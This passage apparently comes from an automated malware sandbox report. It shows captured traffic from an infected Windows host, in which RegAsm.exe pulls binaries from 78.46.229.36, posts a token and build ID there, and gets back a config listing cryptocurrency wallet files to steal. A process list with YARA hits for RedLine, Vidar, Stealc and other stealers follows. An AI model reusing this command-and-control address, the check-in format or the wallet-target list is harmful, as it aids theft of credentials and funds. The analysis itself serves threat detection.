2024-03-28 08:16:53 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-03-28 08:16:53 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49915	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:54 UTC	210	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:16:55 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:55 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-03-28 08:16:55 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-03-28 08:16:55 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-03-28 08:16:55 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-03-28 08:16:55 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-03-28 08:16:55 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49917	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:56 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:56 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------EBKEHJJDAAAAKECBGHDACont
2024-03-28 08:16:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49918	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:57 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIDHDAKJDHJKEBFIEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------JEHIDHDAKJDHJKEBFIEHContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------JEHIDHDAKJDHJKEBFIEHContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------JEHIDHDAKJDHJKEBFIEHCont
2024-03-28 08:16:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:58 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Target ID:	0
Start time:	09:14:51
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\i1crvbOZAP.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\i1crvbOZAP.exe"
Imagebase:	0x7ff649040000
File size:	3'396'944 bytes
MD5 hash:	4204B9D4C4DF5C4B4D67922DB24F342A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1788980748.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1695276080.000002962602B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:14:52
Start date:	28/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:14:52
Start date:	28/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:14:52
Start date:	28/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe
Imagebase:	0x130000
File size:	5'713'216 bytes
MD5 hash:	B474DC1155AF2463F2F9F603E39264FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe
Imagebase:	0x360000
File size:	401'544 bytes
MD5 hash:	89EC2C6BF09ED9A38BD11ACB2A41CD1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1837525388.0000000000362000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe
Imagebase:	0x5b0000
File size:	285'320 bytes
MD5 hash:	B6BBB03B84E589433F139D88CA24C62D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe
Imagebase:	0x740000
File size:	278'664 bytes
MD5 hash:	1163DFDB973A2054DC853BA3723E0363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe
Imagebase:	0xf50000
File size:	4'309'408 bytes
MD5 hash:	A8F21FFC9630C023FD163AF0DA7EAD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2040474083.0000000004E72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: Joe Security Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: ditekSHen Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe
Imagebase:	0x400000
File size:	4'371'848 bytes
MD5 hash:	19625E4EEA21C969143C6C5E964D16B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe
Imagebase:	0x400000
File size:	1'945'878 bytes
MD5 hash:	934A4D455165C851267269B2823667FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
Imagebase:	0x400000
File size:	292'864 bytes
MD5 hash:	3E827E8493283924563C9CD4D0DFCD0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe
Imagebase:	0x400000
File size:	4'371'848 bytes
MD5 hash:	0CF89B056C66BEF40DEDB8AFC4F57EB6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
